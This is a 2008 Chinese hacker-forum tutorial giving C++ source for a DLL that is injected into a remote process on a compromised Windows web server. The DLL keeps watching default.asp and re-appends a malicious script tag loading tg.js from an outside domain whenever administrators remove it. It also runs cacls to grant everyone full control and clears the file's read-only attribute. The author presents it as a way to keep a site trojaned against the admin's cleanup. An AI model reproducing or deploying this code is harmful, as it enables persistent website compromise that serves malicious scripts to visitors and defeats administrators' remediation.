编程之简单监控文件挂马程序制作 - 中华隐士黑客联盟,全国最大的免费黑客技术培训基地! 免费一切,共享一切!

编程之简单监控文件挂马程序制作
作者：不详来源：网络发布时间：2008-5-17 9:06:46 发布人：www.hack86.com

编程之简单监控文件挂马程序制作

编程之简单监控文件挂马
                                               gxm
  本人挂马语句经常被管理员KILL，但是自己也有管理员权限，保留的很好，既然被他发现了，怎么说我们也要强行挂上1天到2天，让他去重做系统去。下面是一个简单的监控某个文件，给予他访问的权限。然后在检查代码中有无我们事先插入的代码，没的话就插入，有的话，等等在检查便。如此循环。此程序只提供个简单的思路，无自启动代码。只实现这个功能，关于进程隐藏，自启动自己解决。因我是一个EXE远程线程插入DLL。所以我的主程序是个DLL文件，因此代码是个DLL工程
代码如下：
#include "stdafx.h"
#include "process.h"
#include "windows.h"
#include "string.h"
#include "iostream.h"
#include "fstream.h"
char path2[256]="E:\\gxm\\default.asp";
char guama[256]="\n<script language=javascript src=’http://www.gxm520.cn/tg.js’></script>";
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                                         )
{
        switch ( ul_reason_for_call )
        {
                case DLL_PROCESS_ATTACH:
                {
                        while(1)
        {
ifstream ifs(path2);
char FileContent[5000];
memset(FileContent,0,5000);//初始化FileContent
ifs.read(FileContent,5000);//读取数据
ifs.close();//关闭ifstream对像
if(strstr(FileContent,guama)==0)
{
    char path1[256]="E:\\gxm\\default.asp ";      //比变量path2多了一个空格
        char mingling[256]="cacls ";
    strcat(mingling,path1);
    char ps[25]="/T /E /C /G everyone:F";
        strcat(mingling,ps);
    char mingling1[256]="cacls ";
        strcat(mingling1,path1);
        char pa[30]="/T /E /C /G administrator:F";
    strcat(mingling1,pa);
        system(mingling);
    system(mingling1);
        SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY);
    ofstream outfile;
        outfile.open(path2,ios::app);
        if (!outfile)
        {
                exit(0);
        }
outfile<<guama;
outfile.close();
}
Sleep(9000);
        }
                }
                default:
                        return TRUE;
        }
        return TRUE;
}

简单的监控文件程序的代码而已，我也不知道别人是怎么写的，反正自己是这样想出来一点一点的写点，希望对我们一样菜的人有点帮助

黑客软件：	漏洞扫描 \| 木马间谍 \| 加密解密 \| 远程控制 \| 破坏攻击 \| 杀毒软件 \| 防火墙类 \| OICQ专区 \| 黑客必备 \| 常用工具 \| 网吧攻击
文章中心：	最新资讯 \| 黑客技术 \| 电脑基础 \| 菜鸟文摘 \| 网络安全 \| 网络技巧 \| QQ技巧 \| OQ空间代码 \| 免费资源 \| 编程世界 \| 建站技术
素材源码：	论坛相关 \| ASP源码 \| CGI 源码 \| NET 源码 \| PHP 源码 \| 酷站素材 \| 字体素材 \| 图片素材 \| 友情发布 \| 网页模版 \| 建站软件
教程动画：	黑客教程 \| 黑客编程 \| 网站入侵 \| 菜鸟教程 \| 入侵教程 \| 破解教程 \| 电子书籍 \| 网页制作 \| 高级会员 \| 综合教程 \| 本站原创